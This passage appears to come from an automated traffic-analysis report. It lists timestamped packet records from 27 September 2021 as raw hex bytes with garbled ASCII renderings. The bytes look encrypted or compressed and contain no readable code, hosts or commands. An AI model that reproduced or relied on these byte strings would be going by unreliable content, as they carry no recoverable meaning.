26
                                    Data Ascii: !@wcZ$%kYU~{j3[.=\$ItSS87Mf6Ohz5KyDpY'Ze?wVM7v+q^#n0/S^Wvw##8aQg6t6p!M}K^Lbc)7|.<$Ur9wCqL:&
                                    2021-09-27 16:40:46 UTC56INData Raw: 69 a5 47 52 08 ab c9 dc e6 44 ae dd 00 54 f4 d4 05 06 56 9d 19 ac 2c 8c 41 4e f7 55 d3 ed 3a 53 97 a3 05 bf d7 13 e7 0e d9 c1 7a 92 b8 37 a4 01 3a 76 f1 8e 6b d5 24 ca ad c1 1d 7a df 81 08 15 1b 4f 37 ea b9 fc f4 e0 db 1b d5 79 8d f1 58 b8 ea b6 a3 b3 96 ef 21 2e 52 a2 70 4d 8d b8 20 d9 f6 fc 20 ce 27 8b 2b 29 c1 c3 e0 82 d4 61 d4 02 5d c3 f4 79 69 ad 77 87 d6 e2 04 0c 34 cf 90 94 68 37 2e d9 5e 2b c9 6c 79 4f e9 04 28 ac 85 22 22 54 7a 98 b3 97 04 a8 bb 61 ef 4d d2 70 47 09 99 4b cb 81 2f da 1c 53 87 d9 b9 ba f0 a2 2c 8a 56 0b 95 91 40 5e 42 7b a0 95 91 4c e9 c6 c9 79 8f 05 f7 0b e8 20 cf 71 3a 83 8d 66 98 da cb cb 69 74 06 a1 24 aa 39 36 fe 16 da ff 6b a4 df be 65 78 ec fe 05 d2 d5 ac 34 45 1f 9d 67 ae c3 a5 26 f9 9a fc 28 07 de 8e 2c 91 80 45 b8 48 1b
                                    Data Ascii: iGRDTV,ANU:Sz7:vk$zO7yX!.RpM '+)a]yiw4h7.^+lyO(""TzaMpGK/S,V@^B{Ly q:fit$96kex4Eg&(,EH
                                    2021-09-27 16:40:46 UTC57INData Raw: 82 20 fa 9d 4b fd 09 39 b8 8c be 69 41 82 81 32 19 14 26 ec 67 f6 2b 8d 8a f2 19 b2 58 e1 f0 82 04 5c a8 c0 1e 18 21 62 93 e8 f6 06 8e df c8 9f 39 21 7a 90 e8 ef 8c 04 61 00 cb d6 30 8e c0 fc 29 6b f7 e5 b8 6a 9a f7 24 98 b3 5e b6 cf 09 f7 88 bc b2 7c 0b 16 bb 2e 7e 97 e0 3c 34 c5 07 1f 70 9b 41 93 99 bf 00 0a 65 27 ba 22 fe f4 1d c3 63 1a 2b 5d 89 11 0f 82 4a b4 4c 8e 5f f2 07 68 9d 70 32 3d e2 96 42 29 a5 50 59 ea 8f 29 cd 98 0e 1d b1 44 b2 4e 3b b2 fb 62 32 02 b9 9e 36 c0 d1 f7 f3 cf 50 af e5 b7 fd 22 eb fc e6 ea a6 09 ba 59 0b 70 33 35 d4 1d e4 27 50 c0 69 53 31 41 6e b6 a3 8d 7a 49 a2 7c d5 fd b4 7e 12 a3 02 4f 1e 71 51 d0 2d e1 69 cb aa 7a 90 4f dd 04 cb a0 34 88 9c 32 cc 6d ee 58 72 79 ea fb 25 28 14 e5 49 cb 31 24 11 ed bf b8 c8 6a eb 2f a6 b0 40
                                    Data Ascii: K9iA2&g+X\!b9!za0)kj$^|.~<4pAe'"c+]JL_hp2=B)PY)DN;b26P"Yp35'PiS1AnzI|~OqQ-izO42mXry%(I1$j/@
                                    2021-09-27 16:40:46 UTC59INData Raw: e5 d9 be 47 a6 f9 e7 35 2e 58 a8 6c 65 11 b9 3b e3 d9 9a a2 cc 2d 86 22 0f c0 d2 99 2b d2 70 d8 1c 5d b0 f0 79 69 d5 1e 81 d6 e8 16 1b 42 e2 98 82 1c 5e 06 f7 58 89 de 68 13 67 c1 cd 23 84 82 37 24 46 3d 01 b6 97 08 b2 3f 09 5e 4c d3 69 5c 1d 98 32 e3 0d a4 d0 0d 57 36 de a7 bd f1 b2 f0 89 56 01 95 81 45 63 f2 6c af bb 88 c5 ee c0 d8 77 b4 29 e6 03 f4 76 a5 75 3a 81 07 59 92 ce d9 cb 45 74 06 a1 1d 30 2d 1e df 01 d6 e8 70 46 3c bf 65 73 ec f1 05 d6 ac 72 b8 c9 15 f1 45 0c d2 ad 32 ed b2 25 69 5c fc 0e 2a 85 a2 de ab 9e 90 0c 05 e2 2a 91 27 61 9f 79 fc 2a a3 e4 a1 15 af 97 96 f3 34 06 71 c5 0f 59 9b f2 90 10 dc c1 72 fe 3e a7 39 1f a0 f4 e5 67 4c 77 50 56 d8 f4 ef 3c 2e 0e 5b 78 e7 b1 da cb 7b 71 0b 3b 85 3b f5 c0 6d 6e 70 3e fd c3 09 bc 2d c6 6a 86 83 8a
                                    Data Ascii: G5.Xle;-"+p]yiB^Xhg#7$F=?^Li\2W6VEclw)vu:YEt0-pF<esrE2%i\**'ay*4qYr>9gLwPV<.[x{q;;mnp>-j
                                    2021-09-27 16:40:46 UTC60INData Raw: d2 8c 94 b0 7d 0b 10 6f 08 7c 97 a2 2d 3c ed bb 1b 70 9d 21 b9 9b bf 1c 0d 74 2e d5 37 ff f4 11 1d 36 69 03 5e 89 17 0c 8a 5b bd 71 d9 5d f2 1b 07 b5 73 29 0b f7 9f 3c 2c ca 74 27 ea 89 29 b7 33 0b 35 b9 4f 9a 66 56 94 ff 6e 47 08 b1 b6 73 cf f9 d0 98 e5 54 87 c0 b0 ec 21 ac cb e3 ea aa ff 8b 7c 23 4d 1b 04 de 0e e4 78 f6 c7 41 78 39 69 50 9e 80 87 a4 41 8d 74 d9 d7 b2 56 36 e2 1e 45 71 6d 50 d0 2b d8 6f b8 10 6c 91 45 f7 2b a5 17 35 9d 96 5d 74 76 ee 52 60 63 e2 1d 24 1c 15 f7 40 62 88 25 00 f1 bf b7 83 da e9 2f a0 a3 54 9b 2f a0 42 2a 3a 65 5c e7 9f 66 34 91 c5 76 65 dd 17 cd 44 76 d4 9c 43 eb 77 2f 8c 6e 11 ef 13 bf 12 28 2c 73 ad ae 84 34 00 15 73 a8 8a ae 5e 88 92 63 71 bb 22 f3 f2 26 05 b1 b6 a6 cb 9b f5 05 f5 42 db 6c 48 dd d6 a1 a0 f4 b5 7e fa b7
                                    Data Ascii: }o|-<p!t.76i^[q]s)<,t')35OfVnGsT!|#MxAx9iPAtV6EqmP+olE+5]tvR`c$@b%/T/B*:e\f4veDvCw/n(,s4s^cq"&BlH~
                                    2021-09-27 16:40:46 UTC61INData Raw: 54 0c 49 25 f4 81 3a d0 0d 56 8e cf af a8 f6 aa 3a 88 a1 0b 84 87 d5 4b d8 79 b9 ae 99 70 23 c0 d8 76 a7 30 f1 15 1c 09 ec 68 3d 8d 8d aa 9b da c7 fb ed 5d d5 aa 0c 3c 11 e2 f5 05 dc c6 43 cb 3b b5 6e 6d f6 ea 12 de ab 63 2b 4c eb f0 68 a6 ca b2 f0 f4 85 e6 7b 5a f6 0e 2a 89 74 f3 83 97 be 34 8a e5 2c 9a 3f 66 8d 6d c5 8f b8 1a aa 4d 2e 86 92 9d ee 03 60 ca 15 4a 8e 6f 21 7f e1 c6 6e 0a 33 a3 ab 34 ba e3 fe 0e 54 67 56 45 35 f1 d2 3e 04 81 5f 62 fe bc 04 cb 58 46 36 c5 84 1d ef ce 68 60 6a 0a e2 c8 10 64 2d d0 46 9b 7d 8a 27 ff fe 78 56 a2 df 99 7e 53 18 e7 cf 24 d3 67 94 ff 15 e6 67 c1 a9 be 64 9a 94 c9 92 6f fd cb 69 a0 a2 61 4c b7 fa 33 ec bd e1 c7 eb e9 df e9 38 ab af 13 44 f1 14 02 cf 41 d3 a9 d8 82 99 e8 bc 1f 70 86 7a e1 93 bc a6 97 e3 5b 95 31 0a
                                    Data Ascii: TI%:V:Kyp#v0h=]<C;nmc+Lh{Z*t4,?fmM.`Jo!n34TgVE5>_bXF6h`jd-F}'xV~S$ggdoiaL38DApz[1
                                    2021-09-27 16:40:46 UTC63INData Raw: 2f d7 ef 4a e6 c8 49 9a e6 37 fd 28 c3 42 f3 ed bf 3f be d9 0b 7a 1b 98 c5 1a f1 14 5a 5b 50 75 2a 61 48 61 80 8d 7a df 9b 59 ce dc a4 ca 27 a4 1d 67 67 f1 41 d7 34 e9 79 24 01 7d 8f 61 d7 83 a4 17 35 14 87 5a 6b 49 f8 ce 70 77 cd 3f 04 a8 14 f7 40 7f 99 22 0e c0 ba 20 aa 4f f6 07 80 23 45 90 37 c2 52 01 2b 4e 13 ae 9f 66 3e 17 89 67 54 d0 18 42 5e 71 da bc 42 89 67 04 90 5a 14 78 02 a9 06 1c f2 f2 81 a7 ac 86 13 12 6a ac b0 42 55 88 83 f4 7a 42 3c f0 a7 9a 14 b2 a9 96 66 30 f5 05 f4 d4 dc 67 41 e1 f8 af b1 f3 aa 5a c9 4f 64 af 7b 5c e1 0b 52 15 79 5b e2 86 0b bb c6 20 d7 33 6d 38 5a c8 90 e6 99 a2 e9 1d da b3 24 02 13 eb 7a 70 a8 c5 c9 87 4e a0 2b f9 10 4b 70 1a 70 8c 49 68 81 bb ce c9 ce 4b d7 97 02 43 fa fe 0b 70 f4 91 e1 4c e8 82 2a c5 30 41 c5 c0 2c
                                    Data Ascii: /JI7(B?zZ[Pu*aHazY'ggA4y$}a5ZkIpw?@" O#E7R+Nf>gTB^qBgZxjBUzB<f0gAZOd{\Ry[ 3m8Z$zpN+KppIhKCpL*0A,
                                    2021-09-27 16:40:46 UTC64INData Raw: a4 d7 5b 27 ef 64 ed 08 4d f3 37 72 95 8a f4 c0 2c 97 1a 82 f1 d4 90 30 8b 8a 0d 8b b0 b5 e6 ab 61 51 b5 94 f2 21 10 6a da 8b 5a 92 7c 26 6c ea d1 68 e2 1a d4 aa 1f a6 5c fc 12 43 5e 0c 58 cb f6 5c 29 1c 8a 73 25 e9 ba 02 78 4f 43 25 13 db 35 e6 c1 db 74 42 15 f4 eb 2d 60 2d c7 53 81 92 82 18 e6 f9 6f 4b e6 0f 89 6b 48 00 63 cf 2f c2 73 83 e8 84 55 4a c4 b5 9f 66 98 97 d8 8e 06 58 34 68 86 d5 6b 5f b1 e1 31 e6 ba 13 ee 3e ea c8 fc 2d ac af 01 4c 2c f9 17 f2 57 e9 b9 6e 04 54 d0 52 32 1f dd 7e eb bd 94 15 96 e9 56 95 46 0b f1 74 a8 6f e9 ec ce 08 a1 24 18 8a ba 89 67 3c c9 29 4d 36 fc a3 a4 be f7 05 ca 56 69 35 b3 55 ec ca 82 41 3e 1e e5 78 c8 05 dc 4e 75 f5 52 67 82 20 fc 19 5d fa 66 1e a9 9a a9 6e 5e bb a9 1e 08 12 49 cc c7 e7 3b 98 8c ea 61 b3 4d f6 77
                                    Data Ascii: ['dM7r,0aQ!jZ|&lh\C^X\)s%xOC%5tB-`-SoKkHc/sUJfX4hk_1>-L,WnTR2~VFto$g<)M6Vi5UA>xNuRg ]fn^I;aMw
                                    2021-09-27 16:40:46 UTC65INData Raw: 22 3c ad 40 e3 82 a9 2e e7 ac bd a8 5a f8 3d b7 2f 7a 90 37 5f 6b b3 34 67 39 06 c5 66 3e 81 8f b6 c6 d1 0e de 4e 65 cb 81 47 18 60 10 9c 5e 2c e6 13 a8 0a 3e c4 61 95 d4 8e 18 02 13 66 92 81 ac 41 a0 e8 6c 6b 43 3a 52 b6 06 05 b4 a5 84 57 92 e3 14 fa 60 dc 60 5e da 4c 22 82 e3 a3 e4 d6 b0 64 ae d9 d1 d2 14 5c 34 47 d6 f3 81 1e 2d f7 82 c4 10 7c 87 5f db 96 5e 96 22 e9 1c c9 0b 24 21 1a ca c6 e1 8c d2 df 87 4e 83 2c d9 9a c6 45 0a 47 13 56 3d 17 8c d8 f2 e1 c4 95 00 02 67 f3 5e 3c 00 68 80 ec 40 dd 8c 6c 41 b1 6a d1 ed 10 5a 1e b5 b7 42 28 e6 2a 09 ed f8 59 ba 3b 3f b7 15 5f 41 f6 8e 61 d9 18 e6 b9 d6 3f 03 dd 87 28 3a 20 5e 62 de d5 f8 f4 e6 cd 96 f3 79 8d f0 89 ae fe a1 6d 16 96 ef 3e 08 43 ac 7d c0 8a b9 3b e8 e2 df b2 ef 31 9d dd 16 c1 d2 92 9a c5 42
                                    Data Ascii: "<@.Z=/z7_k4g9f>NeG`^,>afAlkC:RW``^L"d\4G-|_^"$!N,EGV=g^<h@lAjZB(*Y;?_Aa?(: ^bym>C};1B
                                    2021-09-27 16:40:46 UTC66INData Raw: 93 bc 4a b4 58 98 77 00 1c 68 97 4b 75 f2 19 69 3a 38 b6 41 32 f9 99 00 3b 20 0e 1d aa 41 b2 2e 3d b2 fb 01 58 18 b8 94 1d da e8 d9 df 9f 52 87 c0 d8 e4 29 c3 d4 db 2e a0 21 9e 48 1d 65 12 d2 c7 05 ff 1f 5a f4 10 63 23 59 be 8d 98 a6 33 52 9a 4d f6 ec 95 47 11 cc 21 47 71 6b 41 de 3c 47 68 b8 10 7b 83 67 e6 21 b2 06 2d 04 a9 5d 74 6d 4c 43 43 64 fa b6 24 28 1e df 1a e3 88 2f 39 0d ad bc b1 60 3d 2e a0 a9 6d b4 37 5e 49 69 10 65 33 28 8e 7e 29 5d 8b 78 5a f4 19 53 48 76 c5 96 47 33 67 25 99 67 1a 68 2c ae 19 30 70 63 a7 b3 84 b5 02 15 7f 9d b0 31 6a 88 83 69 7d 6d 95 df b1 0c 29 9a a7 a8 51 3d f2 05 f4 49 de 43 4f f3 f8 22 b8 78 8a 68 e9 b1 c6 be 58 d4 d8 a3 4d 26 65 d8 8c 0d 2b 8f e6 a1 c1 1b 9f a5 4b c5 b5 8f 46 dd 16 0a c9 22 24 1d 1f cb 62 52 a9 c5 c9
                                    Data Ascii: JXwhKui:8A2; A.=XR).!HeZc#Y3RMG!GqkA<Gh{g!-]tmLCCd$(/9`=.m7^Iie3(~)]xZSHvG3g%gh,0pc1ji}m)Q=ICO"xhXM&e+KF"$bR
                                    2021-09-27 16:40:46 UTC67INData Raw: 09 c0 7f 12 51 a4 48 90 f2 e9 e3 8c 7f 0c ba 02 21 ef 25 fa 14 d8 ff 75 fa 93 61 6a 57 d7 ce 14 de b0 76 3b 6d 2d f1 44 a4 1d a5 20 d3 9a ad 74 5c f6 1f 2c 91 8a f4 af 9e 96 0a 8a e5 2a 87 24 75 8b 62 d4 89 a3 fe ab 61 23 8c a6 f1 27 2f 60 c0 06 55 92 7c 36 7d f3 e8 06 f4 32 85 ab 08 76 64 e6 0f 50 5e 24 5c cb fa e8 a2 0c 4c 49 50 da ba 04 d0 76 77 3e 3b 83 3b ce ff 79 65 52 d8 fd c5 29 63 3d c1 40 86 83 8b 0b eb f7 7c 4d d7 3e 98 7f 4a 24 fb dc 0b d3 76 92 e0 eb e7 5a d2 b4 98 64 89 95 de 7d 68 c6 37 70 87 a1 7e 49 4f fb 0e e8 bc 14 c6 c0 f2 36 fb 12 a9 95 17 70 19 e8 00 8c de f8 ac ea 99 66 17 43 2c 07 82 7a 53 ba fb a7 1a e9 5c ac 7f 25 f3 7e bd 6c 8b 5e a1 7b aa 2e 0d 40 87 32 67 3d eb 2e 48 1e d8 92 b7 a9 f1 3c ec 7c f5 33 a0 5b 92 eb a8 35 3c 26 59
                                    Data Ascii: QH!%uajWv;m-D t\,*$uba#'/`U|6}2vdP^$\LIPvw>;;yeR)c=@|M>J$vZd}h7p~IO6pfC,zS\%~l^{.@2g=.H<|3[5<&Y
                                    2021-09-27 16:40:46 UTC68INData Raw: 9d 8a 58 fb fd b2 17 2a a3 02 45 71 6d 50 d0 2b ca 6f 8f 11 7a 90 72 f6 03 a4 02 35 88 96 47 74 6c ef 49 51 76 d2 78 24 28 14 67 40 e3 99 56 70 e6 ac b6 b6 41 86 da a1 a3 4f 83 31 5c 6b 60 35 67 39 3d 9a 77 38 9a 9d 76 5a ff 80 69 20 80 c4 97 5e 1e 71 14 55 61 d4 69 4c ae 19 30 de 63 87 b6 a9 0c 13 10 fb 35 98 ab 3a 7f 82 68 61 63 2b ac 49 07 05 bf a5 a2 57 b4 ff db e5 6d e5 57 5e d0 e4 20 a7 e0 bf 40 d1 b0 64 a5 a5 c0 f6 26 4d 26 6f c6 e3 81 14 8f e6 a0 d7 7d 23 a4 5a d5 8f d3 b8 31 d9 1f da 1d 35 05 0c 4c 5a f0 b9 d3 c2 30 44 a7 33 d9 f8 d6 4d 1f 77 bf 56 3a 0b 54 c8 fa f5 43 b2 0b 14 5c 1b c5 38 13 43 82 cd b0 fb 0a 48 59 2b 44 f2 9a 32 42 8e f2 be 43 28 e6 13 1b fc f2 7d 91 b8 fb b6 13 49 5e f1 8e 70 ab b6 f2 ad cb 1d 8c f3 85 22 1a 22 4b 5e d8 bb fc
                                    Data Ascii: X*EqmP+ozr5GtlIQvx$(g@VpAO1\k`5g9=w8vZi ^qUaiL0c5:hac+IWmW^ @d&M&o}#Z15LZ0D3MwV:TC\8CHY+D2BC(}I^p""K^
                                    2021-09-27 16:40:46 UTC70INData Raw: 60 ca 0e 67 14 78 27 79 d8 44 76 f4 34 a7 29 1b a0 f8 9e f4 55 76 5a 33 36 f1 fe 32 0e ba d3 7c ed bc 2c 53 5a 59 3a 13 12 32 e6 c1 0a 99 59 06 f7 ac fe 63 2d cb 56 8e ec 75 0a f3 e5 6b 85 de 2c 8b 7a 61 33 f8 dc 22 ad 89 93 e5 e1 ef 5a c0 d0 b3 7d 89 98 b2 82 6b ea 3f 07 3c a0 79 55 a2 fd 33 ed 86 3d b8 fb ea c8 f0 36 ba ba 7a 5b f8 ea 09 98 42 fa ac ea dc d6 16 43 3d 24 80 6b ec 96 fe 9f 75 e9 5c bd 41 86 da 7e bb 66 eb e1 b0 7c a8 35 16 35 af 8b 67 37 9a 3f 4f 36 fc ff 05 ae fd 1e ea 6f f5 35 b9 4c 85 ff 86 6c 3d fb e9 78 c8 05 dc 4e 0e ae d7 65 88 f6 fe 94 5a fb 4e 0b ba 8c b2 4b 58 bb a7 1e 85 12 49 cc 4d ff 2c 8b 9d e8 73 8c 50 f0 fc 28 19 79 80 ec 0d 1d 3a 74 b1 c8 cf 06 88 c6 1e 8e ef 1c c3 b8 df e5 a4 81 73 0b b2 41 55 fd e8 f5 01 55 e4 ec a3 bd
                                    Data Ascii: `gx'yDv4)UvZ362|,SZY:2Yc-Vuk,za3"Z}k?<yU3=6z[BC=$ku\A~f|55g7?O6o5Ll=xNeZNKXIM,sP(y:tsAUU
                                    2021-09-27 16:40:46 UTC71INData Raw: c4 bb 5e 04 71 1f 90 2e 9e fb 19 bd 11 31 c3 7a 99 59 ad 36 09 0b f8 a9 90 bd 54 9b 84 71 78 4d 23 ce b9 19 0e 4b b7 8a 41 a1 f2 08 eb 44 de 68 5e c1 e6 2c b4 0a b4 44 e2 b8 73 c0 51 c1 f0 06 52 33 7c cf f3 90 1c 90 e9 5e d6 1f 35 b5 4f de 89 da a8 24 78 0a 85 32 57 0c 1d db cb e8 f7 de ab 7b 56 b6 32 5f 1c 88 78 7f 0f bd 47 3b 8c b4 96 c1 95 34 b0 1a 15 d5 fa d4 4b 06 0b e0 ef 42 d5 0c 57 79 7e 5f b9 9c 3a 53 82 0c b9 02 77 f7 5a 7b f5 f8 4b 03 98 bd b7 13 49 93 ec ed 01 6c 90 ed bd d2 1f a4 cc 8f 3b e2 30 63 7f e7 be ea eb f7 47 01 e7 71 8d e0 95 a0 14 b7 69 b8 87 e8 23 31 00 3e 71 5e 85 b9 2a e1 ed 02 a2 e0 2f 9a 56 30 dd 4e 8e 2b dc 61 cf 00 6a 8f 0a 78 43 d1 95 84 c0 ea 99 bf 5b f6 86 fb 66 38 06 fd 7a 34 d7 73 0f 73 f8 0c 3c 7a 89 0a 28 43 12 33 ad
                                    Data Ascii: ^q.1zY6TqxM#KADh^,DsQR3|^5O$x2W{V2_xG;4KBWy~_:SwZ{KIl;0cGqi#1>q^*/V0N+ajxC[f8z4ss<z(C3
                                    2021-09-27 16:40:46 UTC72INData Raw: ec 27 b7 7f 8f 84 44 84 69 ea 34 7c 98 b5 51 fc b1 fa 28 fe 83 c5 c5 c7 ec de 77 39 ab be 14 4f ee fe 2b 40 43 f8 a6 c8 2f 66 17 49 24 3c 96 72 ff 93 63 a3 97 ef 4a 30 50 0b f1 7f af 73 ec cc 02 7b a0 2e 06 72 79 8a 67 3b f7 b0 4a 36 f6 91 a3 bb e9 3c 61 7e f5 3f 9b c3 83 ee 8a 69 a1 22 5f 7e e0 0a cc 48 67 ce dc 74 89 0e 64 95 5a f0 4b 20 ab 86 90 f7 49 aa ab 1b 2f 61 6b c4 65 f0 3e 87 8a f7 5e 30 5d e1 fc 33 21 7b 80 f1 0f 14 3a 7a f6 e4 cc 06 88 c4 1a 8e ed 5b 79 ba df e9 9d 02 63 02 d7 44 32 8e cc f1 10 5f 98 f0 b3 b4 92 2f 01 ba b1 69 b6 cf 42 d0 85 94 8a 7c 0b 1c de 2e 6f 92 b3 ea 27 c0 e9 1a 61 94 70 38 67 40 e5 d4 74 03 92 15 fe f4 11 d0 6d 1c 2c 74 b1 11 1f 89 94 b6 5f a4 56 d8 1d 68 dc 45 29 0d e6 96 2d 2b 2f 50 25 ea b8 39 be 22 cf 1c bb 4e 95
                                    Data Ascii: 'Di4|Q(w9O+@C/fI$<rcJ0Ps{.ryg;J6<a~?i"_~HgtdZK I/ake>^0]3!{:z[ycD2_/iB|.o'ap8g@tm,t_VhE)-+/P%9"N
                                    2021-09-27 16:40:46 UTC73INData Raw: de 81 ce a6 65 75 0c d4 31 15 fc 0c dd 5a 6c b9 cb d6 12 7f 4e 34 ce 06 4b 70 13 70 be 49 33 81 bb c7 c9 fc 74 3b 0b 13 44 79 d5 1a 0e 64 a0 12 53 d3 9d d4 48 2f 59 d7 e3 58 de 95 93 b9 4c 37 a0 a5 0a f2 f6 42 b2 53 3d b7 13 d5 dd ff 9d 64 df 7f 7f ac c1 11 b7 d9 59 36 39 19 78 76 f6 b3 ef f2 e6 d7 33 cc 79 8d fb 40 7d ea b6 45 a0 92 c7 60 2a 52 a4 05 ca 8c b9 3d ff 0f fd b2 c8 48 03 50 29 c7 c4 6d 3a c2 9f df 68 59 9a f2 53 79 d3 97 e9 5e e9 17 0e 5d 29 83 9b 71 33 3e 7f 5c 2b cf 71 03 62 e0 2c bf 80 88 20 4d d8 14 28 b4 84 06 b4 b6 1f 57 64 24 79 54 0a ff ae f5 81 29 c3 00 47 90 de a6 81 7b 9e 39 8e 39 81 85 87 57 58 df 1b a7 bf 9f 4e fa cc f0 e1 a7 21 fd 1a ee 19 c7 5d 5c 84 a5 42 93 cb c8 8c 86 77 06 ad 63 2e 38 36 fe 16 dc 9d 45 c9 3b b9 76 79 ee f2
                                    Data Ascii: eu1ZlN4KppI3t;DydSH/YXL7BS=dY69xv3y@}E`*R=HP)m:hYSy^])q3>\+qb, M(Wd$yT)G{99WXN!]\Bwc.86E;vy
                                    2021-09-27 16:40:46 UTC75INData Raw: 81 b2 87 cc 14 c2 74 cc 72 b2 5f 83 9d 57 40 38 2c 4c 7f d9 02 d9 60 1d df d6 63 95 ab ec 94 5a fb 75 10 ab 83 ae 69 4d 08 b0 39 0a 02 58 d6 71 e2 3a 06 b4 fb 76 a6 4a f0 eb 4d 1d 6e 1c e6 0f 0f 03 d6 99 c0 c4 20 9f c4 00 0f cb 2b 4e a8 c9 75 a4 1f 72 0b b2 bc 25 8e ca f6 29 47 f7 e5 b8 9c ac f0 0e 95 ed 4b b6 cf 49 d0 8d ad b5 68 23 b3 04 2e 78 80 29 3b 34 c5 f9 0c 60 8a 5e 85 b1 19 1e 0a 63 84 ab 32 ea e0 0f eb c0 1a 21 56 9d 39 b8 87 4a b2 4f 03 58 f2 1d 69 89 65 3d 25 45 96 2d 21 8d cc 25 ea 85 2b b7 33 09 09 93 eb 9e 60 3f a5 70 69 41 19 b9 8d 20 da e9 c0 df 67 52 87 c0 15 ec 38 d7 ca f6 c2 03 21 9e 53 1f 52 bc 00 d4 1b f8 86 4b c7 41 73 21 55 7c b6 23 8d 7a 49 a2 c2 d1 fd b8 45 3e b2 0b 69 28 7c 59 f8 a4 cb 6f b2 3d 2a 81 4d db 4f b5 1f 1d 07 97 5d
                                    Data Ascii: tr_W@8,L`cZuiM9Xq:vJMn +Nur%)GKIh#.x);4`^c2!V9JOXie=%E-!%+3`?piA gR8!SRKAs!U|#zIE>i(|Yo=*MO]
                                    2021-09-27 16:40:46 UTC76INData Raw: 61 d8 06 9d b0 c3 17 ae d9 e8 3c 1e 31 45 7a e9 b3 f1 f4 e9 c4 0d 0a 78 a1 e3 99 92 d1 b3 45 b7 80 c7 1a 2e 52 a8 7c 7e 3e a6 2c e4 f1 f5 bc d6 d9 8a 7d 27 11 cd 93 38 d6 49 ca 08 75 92 f8 66 74 cf 93 8f c9 e2 e9 09 66 e6 94 bc 55 3f 06 f1 4a 03 e1 60 07 79 ff 44 bc 85 88 26 3d 59 18 28 bb 8e f0 a4 9e 00 5d 3f da 78 54 06 ff 2d f6 81 25 db 17 5b 94 c6 b8 57 e4 b6 3b 90 5b 0b 8d 98 4a b5 d9 44 a7 85 54 49 e9 c0 c7 6a aa 21 fe 14 ff f6 c1 59 34 55 b9 48 9a d8 e5 f7 8c 75 0c a7 13 28 34 36 fd 1d 28 ef 4b cf 2f b3 7c 7f ff f0 0b d5 44 64 18 4b c5 eb 44 ae c1 8d 32 f9 9a e6 64 43 fa 12 2c 98 94 0c ae b2 83 1d a0 d3 2f 91 20 63 a3 43 d4 89 a9 f2 eb 0c dd 68 69 ed 2e 0e 60 c9 19 5d 6c 7d 0b 77 c8 a8 73 f4 32 90 bd 12 a0 f7 f2 19 aa 77 7c 52 1b d2 fe 38 04 ba 4f
                                    Data Ascii: a<1EzxE.R|~>,}'8IuftfU?J`yD&=Y(]?xT-%[W;[JDTIj!Y4UHu(46(K/|DdKD2dC,/ cChi.`]l}ws2w|R8O
                                    2021-09-27 16:40:46 UTC77INData Raw: a4 84 8c 0e 76 21 9a 6e 33 f3 a1 f7 01 57 dd e5 b2 b4 8b c1 0c 9f b1 5e b6 cf ed c3 88 ad a4 77 20 0d 00 29 69 69 a5 10 36 dd f3 1f 77 8d b0 92 b5 bd 0d 01 65 21 a2 dc ff d8 19 e8 61 31 c2 5e f2 7d 1f 83 4e 9e 7b 8c 5c 8f 71 68 9d 75 03 0d e6 96 3e 1b a7 50 0d ea 8f 38 2f 22 0e 0c ad 45 b1 7b 39 b5 ea 90 40 35 ba 86 3b cb fe c0 09 ce 7a 85 d1 bc fd 2f db 20 e3 c6 a2 0a 9c 72 e8 78 60 69 d4 1d ea 21 7a c5 42 5a 24 41 68 94 fd e0 7a 43 8e 74 d1 fd a1 66 34 a3 2a 45 71 6d f6 d0 2b db 79 b3 3b 61 90 42 e0 fd a5 3b 37 90 9d 5d 73 7a 10 53 4d 72 c5 12 24 2f 0c 09 41 cf 8a 0e 13 cc 4f be c0 26 e9 2f a4 89 67 92 34 23 2d 06 34 63 19 28 b5 66 2d bb 9c 60 c9 fa 0e de 4f 76 c5 97 56 3d 61 03 8f 7c 01 c9 18 86 27 34 d2 74 f2 81 ae 1a 08 6f 77 81 b8 27 51 88 85 b8 7e
                                    Data Ascii: v!n3W^w )ii6we!a1^}N{\qhu>P8/"E{9@5;z/ rx`i!zBZ$AhzCtf4*Eqm+y;aB;7]szSMr$/AO&/g4#-4c(f-`OvV=a|'4tow'Q~
                                    2021-09-27 16:40:46 UTC79INData Raw: f5 77 c8 cd 1b 7c 73 e9 00 08 a6 8a 25 5f 29 15 28 b6 bd 0e a5 b2 1d 6e 4e d2 52 54 0c 90 2c f4 81 3e c6 06 7d 8f cf a8 be 1b 9b 15 8a 4e 00 84 80 47 b5 d9 44 ad aa 94 48 ee d8 26 77 8b 23 dc 09 c9 eb c2 0e 46 85 a5 4c b0 f8 cf e0 f1 09 06 ab 08 1c 39 36 f4 16 e6 ec 67 e3 3b bf 65 7a ff f9 05 c8 b1 4e 2f 45 12 e6 ba af ef a7 3e f2 9a eb 7e a2 f7 33 2e 86 81 f2 a8 86 68 1b a4 e7 01 93 0d 96 89 16 a9 89 a3 e0 81 43 20 94 eb 8f 27 03 64 ea 06 4f 92 6f 17 7d f0 e8 72 f4 32 87 ae 1f b1 e8 e6 23 4f 76 57 4b 35 f1 d2 3a 1e 99 5b 7f fb 44 05 f6 5c 4e 37 3b 82 29 18 c6 55 67 73 04 d6 20 01 19 53 c1 40 82 a9 a9 09 f0 92 02 5f cd 3a b2 44 5b 3c ee dc 22 d9 74 85 98 68 e7 4b c0 95 a0 4f 8b 92 e1 83 69 ea 3d 68 8c b0 6f 54 9a e1 22 ed bc e1 c7 eb e8 d0 f1 3e ac a8 eb
                                    Data Ascii: w|s%_)(nNRT,>}NGDH&w#FL96g;ezN/E>~3.hC 'dOo}r2#OvWK5:[D\N7;)Ugs S@_:D[<"thKOi=hoT">
                                    2021-09-27 16:40:46 UTC80INData Raw: 0d 7a 90 32 02 85 ae 25 ea 8f a4 b8 3d 24 3d 6d 4e 9a 60 a5 b4 e2 45 61 fe b8 9e 30 57 ff c9 db d0 71 1b c0 a8 d0 37 b6 42 e4 f5 8e 3d 02 5f 14 55 3b 8f d4 1d ee 97 4a d8 71 6d 7c dd 6e 81 b1 9b e6 45 95 6c f1 21 b2 56 36 3f 04 5a 42 72 5f 4c 2d d5 5b a7 20 e6 96 5a c2 23 04 17 35 88 0a 5b 6b 5a ce cc 61 70 d2 85 22 37 23 d7 bd e3 88 25 8d e1 b3 84 a4 41 75 29 bf 9a 65 15 37 5e 43 9a 32 78 09 0e 6e 66 3e 8b 04 66 54 c1 2e 16 4f 76 c5 0b 52 0a 4a 23 25 76 02 e4 8f a8 06 0c cd 07 1d a1 b3 24 22 d4 75 82 90 21 53 97 bc 76 f7 43 3c 9f aa 9a 03 aa f7 b9 3f 2c f3 1a b6 5f 51 66 41 93 ce d1 a0 f4 b5 f4 ef af 20 8f ec c0 f0 0c d1 20 70 82 d3 59 14 8f e6 3c d1 2c 2b 